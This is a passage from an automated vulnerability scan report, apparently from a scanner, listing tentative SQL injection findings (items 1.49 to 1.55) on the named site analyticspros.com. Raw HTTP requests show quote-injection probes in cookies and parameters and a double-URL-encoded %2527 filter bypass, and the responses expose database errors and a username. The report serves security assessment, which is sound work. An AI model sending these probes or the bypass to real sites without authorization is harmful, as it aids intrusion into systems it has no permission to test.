Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0'; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:56:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0''; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:56:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.49. http://www.analyticspros.com/blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html

Issue detail

The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the d4dad6935f632ac35975e3001dc7bbe8 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:48:14 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:48:15 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:48:17 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:48:17 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37445


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.50. http://www.analyticspros.com/blog/55-googleanalytics/95-more-dimensions-site-search-source-medium.html [1ee73a388da0bb7ec3d7afe3beccac53 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/95-more-dimensions-site-search-source-medium.html

Issue detail

The 1ee73a388da0bb7ec3d7afe3beccac53 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 1ee73a388da0bb7ec3d7afe3beccac53 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics/95-more-dimensions-site-search-source-medium.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00'; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:52:27 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/95-more-dimensions-site-search-source-medium.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00''; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:52:27 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.51. http://www.analyticspros.com/blog/55-googleanalytics/95-more-dimensions-site-search-source-medium.html [apros2.0_tpl cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/95-more-dimensions-site-search-source-medium.html

Issue detail

The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the apros2.0_tpl cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/95-more-dimensions-site-search-source-medium.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0%2527; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:59:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/95-more-dimensions-site-search-source-medium.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0%2527%2527; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:59:37 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:59:39 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:59:39 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22780


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.52. http://www.analyticspros.com/blog/55-googleanalytics/97-workshop-january-29th-dimensionator.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/97-workshop-january-29th-dimensionator.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/97-workshop-january-29th-dimensionator.html%2527 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 06:58:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/97-workshop-january-29th-dimensionator.html%2527%2527 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 06:58:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.53. http://www.analyticspros.com/blog/55-googleanalytics/97-workshop-january-29th-dimensionator.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/97-workshop-january-29th-dimensionator.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics/97-workshop-january-29th-dimensionator.html?1'=1 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:54:09 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/97-workshop-january-29th-dimensionator.html?1''=1 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:54:10 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:54:13 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:54:13 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21379


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.54. http://www.analyticspros.com/blog/56-seo/59-search-ranking-position-with-ga.html [__utmmobile cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/56-seo/59-search-ranking-position-with-ga.html

Issue detail

The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmmobile cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/56-seo/59-search-ranking-position-with-ga.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c%2527;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:31:41 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/56-seo/59-search-ranking-position-with-ga.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c%2527%2527;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:31:42 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:31:43 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:31:43 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27790


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.55. http://www.analyticspros.com/blog/56-seo/78-best-seo-video-matt-cutts-wordpress.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/56-seo/78-best-seo-video-matt-cutts-wordpress.html

Issue detail

The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the d4dad6935f632ac35975e3001dc7bbe8 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/56-seo/78-best-seo-video-matt-cutts-wordpress.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=25
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:18:31 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/56-seo/78-best-seo-video-matt-cutts-wordpress.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
